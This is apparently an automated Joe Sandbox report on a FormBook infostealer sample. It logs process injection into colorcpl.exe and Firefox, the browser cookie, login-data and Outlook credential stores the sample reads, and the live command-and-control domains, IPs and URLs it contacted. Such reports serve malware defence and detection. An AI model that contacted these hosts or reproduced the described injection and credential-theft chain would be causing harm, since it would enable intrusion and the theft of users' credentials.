Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: NULL target: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe

Thread register set: target process: 2284

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe

Thread APC queued: target process: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process created: C:\Users\user\Desktop\18in SPA-198-2024.exe "C:\Users\user\Desktop\18in SPA-198-2024.exe"	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process created: C:\Users\user\Desktop\18in SPA-198-2024.exe "C:\Users\user\Desktop\18in SPA-198-2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: tWcBthnLrDi.exe, 00000005.00000002.4472412537.0000000001501000.00000002.00000001.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000005.00000000.2159475025.0000000001501000.00000002.00000001.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000000.2324199284.0000000001A31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: tWcBthnLrDi.exe, 00000005.00000002.4472412537.0000000001501000.00000002.00000001.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000005.00000000.2159475025.0000000001501000.00000002.00000001.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000000.2324199284.0000000001A31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: tWcBthnLrDi.exe, 00000005.00000002.4472412537.0000000001501000.00000002.00000001.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000005.00000000.2159475025.0000000001501000.00000002.00000001.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000000.2324199284.0000000001A31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: tWcBthnLrDi.exe, 00000005.00000002.4472412537.0000000001501000.00000002.00000001.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000005.00000000.2159475025.0000000001501000.00000002.00000001.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000000.2324199284.0000000001A31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Queries volume information: C:\Users\user\Desktop\18in SPA-198-2024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.18in SPA-198-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.18in SPA-198-2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4472767569.0000000005070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4474644674.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4472840073.00000000050C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2248027115.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2249648463.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4472773196.0000000004020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\colorcpl.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.18in SPA-198-2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.18in SPA-198-2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4472767569.0000000005070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4474644674.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4472840073.00000000050C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2248027115.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2249648463.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4472773196.0000000004020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	312 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
18in SPA-198-2024.exe	39%	ReversingLabs	Win32.Trojan.Generic
18in SPA-198-2024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.rebel.tienda	199.59.243.227	true	true	unknown
www.timizoasisey.shop	188.114.97.3	true	true	unknown
jexiz.shop	8.210.3.99	true	true	unknown
7fh27o.vip	3.33.130.190	true	true	unknown
prediksipreman.fyi	162.0.215.244	true	true	unknown
www.ila.beauty	13.248.169.48	true	true	unknown
www.givora.site	162.0.231.203	true	true	unknown
www.college-help.info	38.88.82.56	true	true	unknown
owinvip.net	3.33.130.190	true	true	unknown
ladylawher.org	3.33.130.190	true	true	unknown
gucciqueen.shop	178.79.184.196	true	true	unknown
www.meanttobebroken.org	141.193.213.10	true	true	unknown
www.2925588.com	103.71.154.12	true	true	unknown
wrl-llc.net	3.33.130.190	true	true	unknown
www.prediksipreman.fyi	unknown	unknown	false	unknown
www.7fh27o.vip	unknown	unknown	false	unknown
www.ladylawher.org	unknown	unknown	false	unknown
www.wrl-llc.net	unknown	unknown	false	unknown
www.gucciqueen.shop	unknown	unknown	false	unknown
www.jexiz.shop	unknown	unknown	false	unknown
www.xtelify.tech	unknown	unknown	false	unknown
www.owinvip.net	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.college-help.info/lk0h/	true	unknown
http://www.owinvip.net/17h7/?1Zgl=+i5q+uzPXmftyZtNZWFr8MC7YoCmvyBt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBtoaIRC/e00OgY88L+a0UDDIyF3kq1BSJhp/lI21Ai+QA6UQ==&w6=2vdPP	true	unknown
http://www.7fh27o.vip/l5ty/	true	unknown
http://www.jexiz.shop/li8d/?1Zgl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&w6=2vdPP	true	unknown
http://www.owinvip.net/17h7/	true	unknown
http://www.gucciqueen.shop/x3by/?w6=2vdPP&1Zgl=Gq0m/cYr7UOoL/rfxlXcWcb0PFgu3v+6IQg5KkZ1GbFCfXnP9OdFnXsg+153ZunkN9E3pnQymCUHBFpvF3MPrj7bwNIl4rM9hQX9D40sB8Q0fvNSVLrWgvNkuIucpqHerw==	true	unknown
http://www.givora.site/855d/	true	unknown
http://www.2925588.com/jx6k/	true	unknown
http://www.timizoasisey.shop/3p0l/?1Zgl=4Jzo6X1Gluc/SF20pEVAyAZrEiE76xvvY+EfZYFlmMajnWRT/uq2dkdTzHDiVdaw3QhDvVFcv5rBuyftUViEMVRHp90uGCn944ajrH63wHv4zzWs5+CZDXB+Ld7sX0D68A==&w6=2vdPP	true	unknown
http://www.2925588.com/jx6k/?1Zgl=beqWGJ7SP2hkLKuH8Xmdr/HDPWeS3cMOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrQmwW5G4wa8+lbGyMUfdWvdM0+8z00F7HMhpKv8gPeACQcQ==&w6=2vdPP	true	unknown
http://www.prediksipreman.fyi/3lre/?1Zgl=/6Vdp+1Y21llHWrnJFgTkMelxgdakbST517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnWVF0YU8xlLcjqFiWcTqSDyUhRRfYLZXOVM1ZwNUIzk+NCQ==&w6=2vdPP	true	unknown
http://www.meanttobebroken.org/9g6s/	true	unknown
http://www.prediksipreman.fyi/3lre/	true	unknown
http://www.timizoasisey.shop/3p0l/	true	unknown
http://www.jexiz.shop/li8d/	true	unknown
http://www.wrl-llc.net/6o8s/	true	unknown
http://www.ila.beauty/izfe/?1Zgl=ZqR1VSau/njxt8ya9FYdrisRnPwESR8PWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h1233SUSY5+fAIxnLEAPxNpmpufjlKG3bng8CVsKsGNybcU1g==&w6=2vdPP	true	unknown
http://www.rebel.tienda/7n9v/	true	unknown
http://www.gucciqueen.shop/x3by/	true	unknown
http://www.givora.site/855d/?1Zgl=2B0ERzH0P28lwthSCfczi4+l4RSaGiycEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoS8eZDgAyht6z65PzZnN779aUYRwuiIRWQuovW44/rxTRHXQ==&w6=2vdPP	true	unknown
http://www.ila.beauty/izfe/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.jexiz.shop/li8d/?1Zgl=sm	tWcBthnLrDi.exe, 00000008.00000002.4472994884.0000000003AD8000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://meanttobebroken.org/9g6s/?1Zgl=l/X	colorcpl.exe, 00000007.00000002.4473670706.0000000005E56000.00000004.10000000.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000002.4472994884.0000000003946000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://tempuri.org/Gamee.xsd7PoisonRoulette.GameResource	18in SPA-198-2024.exe	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	colorcpl.exe, 00000007.00000002.4473670706.0000000006954000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4475520630.00000000082F0000.00000004.00000800.00020000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000002.4472994884.0000000004444000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	colorcpl.exe, 00000007.00000002.4473670706.000000000617A000.00000004.10000000.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000002.4472994884.0000000003C6A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.timizoasisey.shop	tWcBthnLrDi.exe, 00000008.00000002.4474644674.0000000005867000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
141.193.213.10	www.meanttobebroken.org	United States	396845	DV-PRIMARY-ASN1US	true
162.0.215.244	prediksipreman.fyi	Canada	35893	ACPCA	true
13.248.169.48	www.ila.beauty	United States	16509	AMAZON-02US	true
162.0.231.203	www.givora.site	Canada	22612	NAMECHEAP-NETUS	true
188.114.97.3	www.timizoasisey.shop	European Union	13335	CLOUDFLARENETUS	true
38.88.82.56	www.college-help.info	United States	174	COGENT-174US	true
178.79.184.196	gucciqueen.shop	United Kingdom	63949	LINODE-APLinodeLLCUS	true
103.71.154.12	www.2925588.com	Hong Kong	132325	LEMON-AS-APLEMONTELECOMMUNICATIONSLIMITEDHK	true
199.59.243.227	www.rebel.tienda	United States	395082	BODIS-NJUS	true
3.33.130.190	7fh27o.vip	United States	8987	AMAZONEXPANSIONGB	true
8.210.3.99	jexiz.shop	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545922
Start date and time:	2024-10-31 10:24:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	18in SPA-198-2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/2@18/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 93 Number of non-executed functions: 278
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
VT rate limit hit for: 18in SPA-198-2024.exe

Simulations

Behavior and APIs

Time	Type	Description
05:24:51	API Interceptor	2x Sleep call for process: 18in SPA-198-2024.exe modified
05:25:52	API Interceptor	10685616x Sleep call for process: colorcpl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.193.213.10	OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe	Get hash	malicious	FormBook	Browse	www.meanttobebroken.org/zdt7/
	bin.exe	Get hash	malicious	Unknown	Browse	www.meanttobebroken.org/zdt7/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.meanttobebroken.org/9g6s/
	http://www.gofreight.com/	Get hash	malicious	Unknown	Browse	www.gofreight.com/
	http://www.trayak.com	Get hash	malicious	Unknown	Browse	trayak.com/
	http://tacinc.org	Get hash	malicious	Unknown	Browse	www.tacinc.org/
	https://exclusive.thechosenadventures.com/unlock/?otreset=false&otpreview=true&otgeo=gb	Get hash	malicious	Unknown	Browse	thechosenadventures.com/
	http://mycoitracking.com	Get hash	malicious	Unknown	Browse	mycoitracking.com/
	http://howardstallings.com	Get hash	malicious	Unknown	Browse	howardstallings.com/
	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	materialdistrict.com/
162.0.215.244	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.prediksipreman.fyi/3lre/
162.0.215.244	http://mirchmasala2go.com	Get hash	malicious	Unknown	Browse	mirchmasala2go.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.timizoasisey.shop	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	188.114.96.3
www.timizoasisey.shop	PR. No.1599-Rev.2.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
www.givora.site	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	162.0.231.203
www.rebel.tienda	mm.exe	Get hash	malicious	Unknown	Browse	199.59.243.227
www.rebel.tienda	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	199.59.243.227
www.college-help.info	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	38.88.82.56
www.college-help.info	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	38.88.82.56
www.ila.beauty	SecuriteInfo.com.Win32.SuspectCrc.28663.30359.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	quotation RFQ no 123609.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
	Due Payment Invoice PISS2024993.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	bin.exe	Get hash	malicious	Unknown	Browse	13.248.169.48
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	13.248.169.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	162.0.231.203
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	63.250.47.57
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.238.246
	http://demettei.com	Get hash	malicious	Unknown	Browse	198.54.117.242
	https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	199.188.200.231
